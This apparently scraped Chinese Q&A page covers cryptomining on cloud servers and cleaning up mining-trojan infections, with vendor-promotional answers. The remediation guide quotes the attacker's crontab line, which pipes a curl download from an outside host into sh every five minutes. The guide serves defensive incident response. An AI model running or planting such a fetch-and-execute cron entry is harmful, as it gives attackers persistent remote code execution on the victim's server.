导航:首页 > 配服务器 > 云服务器被拿来挖坑

云服务器被拿来挖坑

发布时间:2022-01-19 05:56:27

❶ 新人想用服务器挖矿,是否可行

完全可以。

❷ 服务器被下挖矿了怎么办

哥们被下了啥挖矿?去举报啊。之前流量矿石非常火的时候,我的服务器也被无良黑了,成了肉鸡,然后我去找到他的信息,截图跟流量矿石举报,就帮我处理了。你看你的被下了啥,就去找他们处理。

❸ 如何评价腾讯云在防止服务器可能被植入挖矿木马,成为

用护卫神,就可以防止网站和服务器被入侵。

❹ 如何通过云计算服务器实现比特币挖矿

  1. 各公有云厂商都明确要求不允许使用云服务器进行挖矿,否则会被封禁的;

  2. 挖矿主要使用的是GPU,目前各公有云厂商提供的GPU服务器都比较贵的,从性价比上来说不划算,还不如用专用芯片;

当然,有黑客通过漏洞入侵服务器,在上面植入挖矿程序和脚本,进行挖矿操作,但这个本身是不合法的行为。

❺ 求助服务器被挖矿程序入侵,如何排查

新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接

服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般

会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这

就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客

户服务器卡的问题,我们随即安排安全工程师对他的linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,

仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查

当前进程是否存在,不存在就启动挖矿木马,进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病

毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,

客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开

发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重

的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,

SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器

一切稳定运行,网站打开正常。

❻ 能否用云服务器进行cpu挖矿

当然可以啦!
不过要选择可以Cpu挖矿的币。
1.cpu挖矿的本身比较少了,比较有名的有:xmr,hsr等
2.租用服务器的成本要考虑进去了。
挖矿基本没法他用了

❼ 挖矿是云服务器好还是物理服务器好

挖矿需要耗费大量服务器资源,对服务器配置要求比较高。物理服务器相对好些。云服务器相当于物理服务器划分出来的子服务器。

❽ 阿里云windows服务器中了挖矿的病毒怎么清理

光删除没用的,因为没有解决好漏洞。
建议是重做系统,然后找护卫神给你做一下系统安全加固,把漏洞彻底堵住才有效果。

❾ 用GPU云服务器可以挖矿么比如最近很火的以太坊

可以是可以的,但是成本估计你接受不了。

❿ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:

View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

阅读全文

与云服务器被拿来挖坑相关的资料

热点内容
技术指标编程选股公式 浏览:979
php实现word在线预览 浏览:470
联想小新电脑怎么解压文件在哪里 浏览:225
while语句java 浏览:358
银行加密货币储蓄 浏览:461
map默认参数python 浏览:423
山西性能优良压缩机 浏览:197
欧洲tcc编程式模式公司 浏览:984
app的股权与投资怎么写 浏览:580
php网站首页文件 浏览:585
工商银行app怎么支持两个手机登录 浏览:107
安卓手机如何搭建ssr服务器 浏览:668
文件解压到一半跳出来需要密码 浏览:892
phpmysql编译pdo 浏览:514
怎么查看公司邮箱服务器地址 浏览:573
php可忽略大小写的模式符 浏览:948
白熊app稿费怎么样 浏览:465
新建的命令为 浏览:427
数组两种查找算法集合 浏览:759
dw怎么将源码拆成几个文件 浏览:232